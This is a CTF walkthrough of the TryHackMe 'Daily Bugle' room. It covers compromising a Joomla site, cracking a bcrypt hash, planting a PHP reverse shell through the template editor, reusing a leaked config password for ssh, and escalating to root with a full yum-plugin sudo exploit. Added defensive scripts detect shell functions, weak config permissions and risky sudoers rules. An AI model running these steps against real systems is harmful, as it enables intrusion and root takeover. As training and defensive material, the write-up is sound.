Daily Bugle

TryHackMe Room: https://tryhackme.com/room/dailybugle
Difficulty Rated: Hard.

Compromise a Joomla CMS account via SQLi, practise cracking hashes and escalate your privileges by taking advantage of yum.

Firstly let’s do a quick nmap scan to see what ports are open.
nmap -sV -p- -vv IP

We have three ports open: 22 (SSH), 80 (HTTP) and 3306 (MariaDB). Since HTTP is open, there must be a web page or at least some content to look at.

It looks like we have a Joomla CMS setup, and a post about someone.

Flag1: “Access the webserver, who robbed the bank?” Hopefully, you’re about to find the answer, as it’s “front” page news!

Let’s see what else this website is hiding from us; let’s get Gobuster going!

gobuster dir -u http://10.10.181.48/ -t 50 -w directory-list-2.3-medium.txt
Gobuster has found some useful results, including a robots.txt page and an administrator page.
The robots.txt page doesn’t include anything we don’t already know.

The administrator page requires a login, which we don’t have yet sadly.

Flag2: “What is the Joomla version?” So we need to find what version of Joomla is running here, OWASP has a tool which can do just that for us!

perl joomscan.pl -u http://10.10.181.48/

And just like that, we have our version of Joomla for Flag2!

Flag3: “Instead of using SQLMap, why not use a python script! What is Jonah’s cracked password?”

Flag 3 is giving us a hint here, we know the version of Joomla, and if we do a quick Google search, we can see that the version has an exploit.

We found our user, but the password is hashed with bcrypt (Hashcat mode 3200). I guess now it’s time to crack it, using Hashcat and rockyou.txt.

hashcat -D 2 -m 3200 HASHFILE WORDLIST
We have our password and Flag3! I’m using a Windows cracking rig due to better driver support. However, Hashcat works on both Windows and Linux, and the commands are the same.

Now we can log in to the administrator page. With admin access, our next goal is to get a reverse shell, and there are two ways to do this.

Method one is to upload the shell through the media uploader, but first you must allow .php (and other) file types to be uploaded under System – Global Configuration – Media. Once that is changed, you can upload your shell file freely (hopefully?).

Method two is the most common: edit the template itself, include your own PHP reverse shell and refresh the page to start your shell. You can gain a copy of the PHP shell here. Once you have it downloaded and extracted, ensure you change the IP and port to your own (or it won’t connect back to anything).

Before we upload our shell, we should first set up a Netcat listener on our attacker system.

nc -nvlp 1234

“1234” is the port; ensure you change it to the one you set within your PHP shell. No IP address is needed, as Netcat listens on all interfaces, but only on the given port.

Once you’re ready, head to the template editor: Templates – Templates – Protostar Details and Files. You should see this screen.

We want to edit index.php: open index.php within the editor, paste the whole PHP reverse shell, and don’t forget to click on save!
Reload the website. The page should keep “loading”, as right now it’s connecting back to us, the attacker, on the given IP and port. If everything was done correctly, we should see a connection in our NC terminal.
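The template-editor route above leaves an obvious trace on the server, and that trace is what a defender can look for. The script below is an added example, not part of this write-up and not Joomla’s own code: it scans a templates tree for PHP files that call socket- or process-spawning functions, which a stock presentation template such as Protostar never needs. The templates path (/var/www/html/templates on this box) and the two sample files it builds are assumptions.

```shell
#!/bin/sh
# Added example, not part of the original write-up or of Joomla: scan a Joomla
# templates tree (/var/www/html/templates on this box, an assumption) for PHP
# files that call socket- or process-spawning functions. A stock template such
# as Protostar only renders markup, so a hit in index.php is a strong sign the
# template editor was used to plant a shell.

# Function names a presentation template has no reason to call (extend as needed).
SUSPICIOUS_FUNCS='fsockopen|stream_socket_client|proc_open|popen\(|shell_exec|passthru|exec\(|system\(|pcntl_exec'

# scan_templates DIR -> one line per flagged file: "<path>: <first matching term>"
scan_templates() {
    dir="$1"
    find "$dir" -type f -name '*.php' | sort | while read -r f; do
        hit=$(grep -oE "$SUSPICIOUS_FUNCS" "$f" | head -n 1)
        if [ -n "$hit" ]; then
            printf '%s: %s\n' "$f" "$hit"
        fi
    done
    return 0
}

# make_template_fixture -> builds a constructed templates tree and prints its path:
# one clean Protostar-style index.php and one file with a planted fsockopen call.
make_template_fixture() {
    d=$(mktemp -d)
    mkdir -p "$d/protostar"
    cat >"$d/protostar/index.php" <<'EOF'
<?php
defined('_JEXEC') or die;
$doc = JFactory::getDocument();
echo $doc->getTitle();
EOF
    cat >"$d/protostar/error.php" <<'EOF'
<?php
defined('_JEXEC') or die;
$sock = fsockopen($host, $port); // constructed indicator line, not a working shell
EOF
    printf '%s\n' "$d"
}

# Stand-alone demonstration on the constructed fixture.
fixture=$(make_template_fixture)
echo "Flagged template files:"
scan_templates "$fixture"
rm -rf "$fixture"
```

Run it as `scan_templates /var/www/html/templates` on a real install; a clean tree prints nothing. Pairing it with a file-integrity baseline of the templates directory catches edits that avoid these function names.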

Now that we have our shell on the system, let’s see what users are on it.

cat /etc/passwd

We have jjameson and root. Let’s try to access jjameson’s home; dang, it looks like we can’t, as we’re only running as apache and don’t have the correct permissions.

Let’s try sudo -l; sadly, no luck here. Let’s see what distro is running, as we need higher privileges if we want to get the last two flags!

It doesn’t look like much here can help us sadly, let’s have a more in-depth look into the Joomla setup.

cd /var/www/html && ls
Lots of files here, but that configuration.php file looks like it might be of some use to us; let’s cat it.

Using cat, we can see the file holds a lot of information, but the “password” really stands out here. I wonder if that gives us ssh access to jjameson?

We now have ssh access to jjameson! And with this, we can claim Flag4 in user.txt within jjameson’s home folder.
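The jump from apache to jjameson worked because the database password in configuration.php was also the user’s ssh password. Password reuse can’t be checked with a script, but the file itself can be kept away from other local accounts, and stray copies of it can be kept out of the web root. The check below is an added example, not from the write-up and not Joomla’s code; the web root path and the sample configuration it builds are assumptions.

```shell
#!/bin/sh
# Added example, not part of the original write-up or of Joomla: check that a
# Joomla configuration.php (it holds the database password that opened the door
# to ssh here) is not readable by every local user, and that no backup copies of
# it sit in the web root, where the web server would typically serve them as
# plain text because they lack the .php handler. /var/www/html is the web root
# on this box; any path can be passed.

# check_joomla_config WEBROOT -> prints one finding per line, nothing when clean
check_joomla_config() {
    webroot="$1"
    cfg="$webroot/configuration.php"
    if [ ! -f "$cfg" ]; then
        printf 'MISSING %s\n' "$cfg"
        return 0
    fi
    # First ls field is the symbolic mode, e.g. -rw-r--r-- (portable, no stat -c)
    mode=$(ls -ld "$cfg" | cut -c1-10)
    case "$mode" in
        ???????r??) printf 'WORLD_READABLE %s %s\n' "$mode" "$cfg" ;;
    esac
    case "$mode" in
        ????????w?) printf 'WORLD_WRITABLE %s %s\n' "$mode" "$cfg" ;;
    esac
    # Editor and backup copies: no .php handler, so their contents are served verbatim
    find "$webroot" -maxdepth 1 -type f \
        \( -name 'configuration.php.*' -o -name 'configuration.php~' -o -name '*.bak' \) \
        | sort | while read -r f; do
        printf 'BACKUP_COPY %s\n' "$f"
    done
    return 0
}

# make_webroot_fixture -> constructed web root with a mode-644 configuration.php
# and a leftover configuration.php.bak; prints its path
make_webroot_fixture() {
    d=$(mktemp -d)
    cat >"$d/configuration.php" <<'EOF'
<?php
class JConfig {
    public $host = 'localhost';
    public $user = 'root';
    public $password = 'constructed-sample-password';
}
EOF
    cp "$d/configuration.php" "$d/configuration.php.bak"
    chmod 644 "$d/configuration.php"
    printf '%s\n' "$d"
}

# Stand-alone demonstration: findings before and after tightening things up.
w=$(make_webroot_fixture)
echo "Before hardening:"; check_joomla_config "$w"
chmod 640 "$w/configuration.php"; rm -f "$w/configuration.php.bak"
echo "After hardening (no output expected):"; check_joomla_config "$w"
rm -rf "$w"
```

Mode 640 with the web server’s group still lets Joomla read its own config while keeping it from an unrelated local user; the database password being different from every system account password is the part only policy can enforce.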

Now we need Flag5 to complete this room. The only issue is that Flag5 requires root access, and we don’t have it yet. I guess it’s time to bypass our restrictions and get root!

If we run sudo -l, we can see “(ALL) NOPASSWD: /usr/bin/yum”, so we can abuse yum and get root!

Using the following, which points yum at a plugin directory we control and runs a shell from the plugin’s init hook:

TF=$(mktemp -d)
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF

cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF

cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
  os.execl('/bin/sh','/bin/sh')
EOF

sudo yum -c $TF/x --enableplugin=y
We abused yum and got a root shell! We can now grab the last flag: Flag5 is in /root/root.txt.
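The root of the last step is a single sudoers line, and that is the easiest place to catch it before anyone does. The script below is an added example, not part of this write-up: it lists every NOPASSWD command in the sudoers files it is given and rates a yum rule HIGH, because yum accepts a caller-supplied config whose plugin directory it loads and runs as root. The sample sudoers file it builds (whose jjameson line matches the sudo -l output above) and the file paths are assumptions.

```shell
#!/bin/sh
# Added example, not part of the original write-up: audit sudoers files for
# NOPASSWD rules and rate them. A NOPASSWD rule for yum is rated HIGH because,
# as the write-up shows, yum can be pointed at a caller-supplied plugin directory
# and runs that plugin as root. Paths and sample rules are assumptions; on a real
# host run it as root against /etc/sudoers and /etc/sudoers.d/*.

# audit_sudoers FILE... -> "user<TAB>command<TAB>rating" for every NOPASSWD command
audit_sudoers() {
    cat "$@" | sed 's/#.*//' | grep 'NOPASSWD' | while read -r line; do
        user=${line%% *}             # first field: user or %group
        cmds=${line##*NOPASSWD:}     # everything after the tag
        # a rule may list several commands separated by commas
        printf '%s\n' "$cmds" | tr ',' '\n' | while read -r cmd; do
            if [ -z "$cmd" ]; then continue; fi
            case "$cmd" in
                ALL)                    rating=CRITICAL ;;   # passwordless root for anything
                */yum|*/yum" "*|yum)    rating=HIGH ;;       # plugin path is caller-controlled
                *)                      rating=REVIEW ;;     # needs a manual look
            esac
            printf '%s\t%s\t%s\n' "$user" "$cmd" "$rating"
        done
    done
    return 0
}

# make_sudoers_fixture -> constructed sudoers file whose jjameson rule matches the
# sudo -l output in the write-up; prints its path
make_sudoers_fixture() {
    f=$(mktemp)
    cat >"$f" <<'EOF'
# constructed sample, not the box's real /etc/sudoers
Defaults    env_reset
root        ALL=(ALL)       ALL
jjameson    ALL=(ALL)       NOPASSWD: /usr/bin/yum
webadmin    ALL=(root)      NOPASSWD: /usr/sbin/apachectl graceful, ALL
EOF
    printf '%s\n' "$f"
}

# Stand-alone demonstration on the constructed file.
f=$(make_sudoers_fixture)
audit_sudoers "$f"
rm -f "$f"
```

The rating table is deliberately short: anything not ALL or yum lands in REVIEW so a human decides whether the command can be talked into spawning a shell or writing files as root. Removing NOPASSWD, or restricting the rule to a fixed argument list, is the fix for the jjameson line.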

That’s it! We started off by gaining admin access to Joomla, uploaded a shell and gained access to the system, then used that shell to gain higher permissions, and now we’re root!

This room was created by TryHackMe. Thank you so much for the fun room!
